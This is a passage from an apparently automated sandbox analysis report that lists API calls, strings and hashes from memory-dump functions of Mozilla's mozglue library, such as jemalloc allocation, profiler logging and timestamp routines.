                                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6BA64309
                                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6BA64310
                                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6BA64317
                                                                                                                                                                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6BA64324
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ConditionMask$InfoLibraryVerifyVersionmemset$AddressDown@mozilla@@FreeLoadLockedProcWin32k
                                                                                                                                                                                                                                      • String ID: SetProcessDpiAwareness$Shcore.dll
                                                                                                                                                                                                                                      • API String ID: 3038791930-999387375
                                                                                                                                                                                                                                      • Opcode ID: 680ce750bdccd412b020f8caf351a3189fd3594cade44ca28a125c152bfeb05b
                                                                                                                                                                                                                                      • Instruction ID: a6116883b19e2db1d81e0d7f4826ee3907cf74c7dac5d316e3665e04cb1cfff3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 680ce750bdccd412b020f8caf351a3189fd3594cade44ca28a125c152bfeb05b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1451E2B1A443146BEF106B758C59BAFB768EF86B50F058618F9059B1C0EF78D981CBA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6BADE804), ref: 6BA8D047
                                                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 6BA8D093
                                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6BA8D0A6
                                                                                                                                                                                                                                      • GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6BADE810,00000040), ref: 6BA8D0D0
                                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6BADE7B8,00001388), ref: 6BA8D147
                                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6BADE744,00001388), ref: 6BA8D162
                                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6BADE784,00001388), ref: 6BA8D18D
                                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6BADE7DC,00001388), ref: 6BA8D1B1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
                                                                                                                                                                                                                                      • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
                                                                                                                                                                                                                                      • API String ID: 2957312145-326518326
                                                                                                                                                                                                                                      • Opcode ID: b86a493fefd799325a3825b8933f28f7f618547c28bde7fa605970b9fce4589e
                                                                                                                                                                                                                                      • Instruction ID: f99fece6b599f248b040a99b73527ec44e1bcc5ef8233a44a4567e657a4ed2f6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b86a493fefd799325a3825b8933f28f7f618547c28bde7fa605970b9fce4589e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6281E570A98300AFEF009F68C944B69B7F5FB86704F14816FE9819BB80D779D882CB51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BA9FADC
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9FAE9
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BA9FB31
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BA9FB43
                                                                                                                                                                                                                                      • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6BA9FBF6
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9FC50
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • [D %d/%d] profiler_unregister_thread: %s, xrefs: 6BA9FC94
                                                                                                                                                                                                                                      • [I %d/%d] profiler_unregister_thread() - thread %llu already unregistered, xrefs: 6BA9FD15
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentThread$D@std@@ExclusiveLockMarkerTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Marker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfileProfilerReleaseStringView@
                                                                                                                                                                                                                                      • String ID: [D %d/%d] profiler_unregister_thread: %s$[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered
                                                                                                                                                                                                                                      • API String ID: 2101194506-3679350629
                                                                                                                                                                                                                                      • Opcode ID: e57ebc291e8eb2f81bbd4a3751d5097c2782e1f574ec87106d65b18cbddaf104
                                                                                                                                                                                                                                      • Instruction ID: de0d3a544c8caa630f948d5a01386380c0e07adc10c6d8ada1c6998cb7aa597e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e57ebc291e8eb2f81bbd4a3751d5097c2782e1f574ec87106d65b18cbddaf104
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76710E709087008FDF10EF28D544B6AB7E0FF85708F45856EE8558B351EB3AE882CB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6BADE768,?,00003000,00000004), ref: 6BA53AC5
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6BADE768,?,00003000,00000004), ref: 6BA53AE5
                                                                                                                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,00003000,00000004), ref: 6BA53AFB
                                                                                                                                                                                                                                      • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6BA53B57
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6BADE784), ref: 6BA53B81
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6BADE784), ref: 6BA53BA3
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6BADE7B8), ref: 6BA53BAE
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6BADE7B8), ref: 6BA53C74
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6BADE784), ref: 6BA53C8B
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6BADE784), ref: 6BA53C9F
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6BADE7B8), ref: 6BA53D5C
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6BADE784), ref: 6BA53D67
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6BADE784), ref: 6BA53D8A
                                                                                                                                                                                                                                        • Part of subcall function 6BA90D60: VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6BA53DEF), ref: 6BA90D71
                                                                                                                                                                                                                                        • Part of subcall function 6BA90D60: VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6BA53DEF), ref: 6BA90D84
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalSection$Leave$Enter$Virtual$Free$Alloc
                                                                                                                                                                                                                                      • String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_CRASH()
                                                                                                                                                                                                                                      • API String ID: 2380290044-2272602182
                                                                                                                                                                                                                                      • Opcode ID: 03ab5fb2eac0a6650e282f3c7428bc3f477fde2bf38f5e291a47204d85c69bac
                                                                                                                                                                                                                                      • Instruction ID: 79362c273d0fdc8dedef99173c0c575df2602bb4d47f6ce7133f4888efbddc07
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 03ab5fb2eac0a6650e282f3c7428bc3f477fde2bf38f5e291a47204d85c69bac
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C591BE72B043048BCF54CF68C8C476AB7F2FBC5710B158668E9529B381DB79DAA1CB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32,00000084), ref: 6BA61213
                                                                                                                                                                                                                                      • toupper.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6BA61285
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32,00000076), ref: 6BA612B9
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32,00000078,?), ref: 6BA61327
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32, xrefs: 6BA6131B
                                                                                                                                                                                                                                      • TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32, xrefs: 6BA612AD
                                                                                                                                                                                                                                      • Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32, xrefs: 6BA6120D
                                                                                                                                                                                                                                      • MZx, xrefs: 6BA611E1
                                                                                                                                                                                                                                      • &, xrefs: 6BA6126B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$toupper
                                                                                                                                                                                                                                      • String ID: &$CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32$Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32$MZx$TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32
                                                                                                                                                                                                                                      • API String ID: 403083179-3658087426
                                                                                                                                                                                                                                      • Opcode ID: 1f3e2e9f807ba181759a098fa8e74887e84000a84c3f0b2d6ef2a5a21ffe1fb3
                                                                                                                                                                                                                                      • Instruction ID: 911187b03ce4557d4d8398bf7c36e77688153cdc7384cf838977e1bf6e238261
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f3e2e9f807ba181759a098fa8e74887e84000a84c3f0b2d6ef2a5a21ffe1fb3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C971A0B1E043248ADF109F74C9057EEBBF5BF54389F04169ED445A3240EB386AC5CBA2
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6BA53217
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6BA53236
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32 ref: 6BA5324B
                                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6BA53260
                                                                                                                                                                                                                                      • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6BA5327F
                                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BA5328E
                                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BA532AB
                                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BA532D1
                                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6BA532E5
                                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6BA532F7
                                                                                                                                                                                                                                        • Part of subcall function 6BA8AB89: EnterCriticalSection.KERNEL32(6BADE370,?,?,?,6BA534DE,6BADF6CC,?,?,?,?,?,?,?,6BA53284), ref: 6BA8AB94
                                                                                                                                                                                                                                        • Part of subcall function 6BA8AB89: LeaveCriticalSection.KERNEL32(6BADE370,?,6BA534DE,6BADF6CC,?,?,?,?,?,?,?,6BA53284,?,?,6BA756F6), ref: 6BA8ABD1
                                                                                                                                                                                                                                      • __aulldiv.LIBCMT ref: 6BA5346B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Time$StampV01@@Value@mozilla@@$CriticalLibrarySectionStamp@mozilla@@$AddressCreation@EnterFreeInit_thread_footerLeaveLoadNow@ProcProcessV12@V12@___aulldiv
                                                                                                                                                                                                                                      • String ID: KernelBase.dll$QueryInterruptTime
                                                                                                                                                                                                                                      • API String ID: 3006643210-2417823192
                                                                                                                                                                                                                                      • Opcode ID: 0988e7ed07b3334c8bc1f777c07b69f2048f64ed7f876fed8c6cc1a7152e39af
                                                                                                                                                                                                                                      • Instruction ID: 298826ffa0c0acc7398c0ee95768374f5ab076a44ca756d3569a746abc2f39e4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0988e7ed07b3334c8bc1f777c07b69f2048f64ed7f876fed8c6cc1a7152e39af
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6161D2729087419BCB21CF38C45165BB3E5FFC6350F258B2DE8A6A3290EB35D596CB42
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BAAD85F
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6BAAD86C
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BAAD918
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BAAD93C
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6BAAD948
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BAAD970
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BAAD976
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6BAAD982
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BAAD9CF
                                                                                                                                                                                                                                      • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6BAADA2E
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BAADA6F
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6BAADA78
                                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6BAADA91
                                                                                                                                                                                                                                        • Part of subcall function 6BA75C50: GetTickCount64.KERNEL32 ref: 6BA75D40
                                                                                                                                                                                                                                        • Part of subcall function 6BA75C50: EnterCriticalSection.KERNEL32(6BADF688), ref: 6BA75D67
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BAADAB7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionStampTickTimeV01@@Value@mozilla@@Xbad_function_call@std@@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1195625958-0
                                                                                                                                                                                                                                      • Opcode ID: ca619b9e1af6a0914cc480f529094ec3f058c25031ed56db5436f5c75730536e
                                                                                                                                                                                                                                      • Instruction ID: 82e9e060bbec7a8d04df107ccbf5480be62d8fd21c24b0505177e0b026683002
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca619b9e1af6a0914cc480f529094ec3f058c25031ed56db5436f5c75730536e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83718D756043049FCB00CF28C888B5ABBE5FF89310F55866DEC9A9B351DB34E985CBA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • AcquireSRWLockShared.KERNEL32 ref: 6BA63BB4
                                                                                                                                                                                                                                      • ReleaseSRWLockShared.KERNEL32 ref: 6BA63BD2
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32 ref: 6BA63BE5
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32 ref: 6BA63C91
                                                                                                                                                                                                                                      • ReleaseSRWLockShared.KERNEL32 ref: 6BA63CBD
                                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE ref: 6BA63CF1
                                                                                                                                                                                                                                        • Part of subcall function 6BA6CA10: malloc.MOZGLUE(?), ref: 6BA6CA26
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Lock$ReleaseShared$AcquireExclusive$mallocmoz_xmalloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1881024734-0
                                                                                                                                                                                                                                      • Opcode ID: edc205fe7a831862e50d5b1ebfb6f6033463d3f01e97ac61c39edc69f5f6879b
                                                                                                                                                                                                                                      • Instruction ID: ed75278dcf251c2eb9870ab831fc63e361f76cc69d8c0c3bbc5fc22df2cc9f37
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: edc205fe7a831862e50d5b1ebfb6f6033463d3f01e97ac61c39edc69f5f6879b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8EC14EB0908741CFCB24DF28C18465ABBF1FF89344F158A5ED8998B751E735E886CB82
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BA64A68), ref: 6BA9945E
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BA99470
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BA99482
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: __Init_thread_footer.LIBCMT ref: 6BA9949F
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BA9EBA4
                                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6BA9EBAC
                                                                                                                                                                                                                                        • Part of subcall function 6BA994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6BA994EE
                                                                                                                                                                                                                                        • Part of subcall function 6BA994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6BA99508
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BA9EBC1
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6BADF4B8,?,?,00000000), ref: 6BA9EBCE
                                                                                                                                                                                                                                      • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6BA9EBE5
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6BADF4B8,00000000), ref: 6BA9EC37
                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6BA9EC46
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 6BA9EC55
                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6BA9EC5C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • [I %d/%d] profiler_start, xrefs: 6BA9EBB4
                                                                                                                                                                                                                                      • [I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6BA9EA9B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: getenv$CurrentExclusiveLockThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectReleaseSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                                                                                                                                                      • String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
                                                                                                                                                                                                                                      • API String ID: 4250961200-1186885292
                                                                                                                                                                                                                                      • Opcode ID: d37064385930b9ef091cddc060e560d7ccdee3275c32721c2d428252dafa6f44
                                                                                                                                                                                                                                      • Instruction ID: 2c0bde7723786a514c7ecc71402fd14395f7ea0c70e980c6ccd9087ce7a7f788
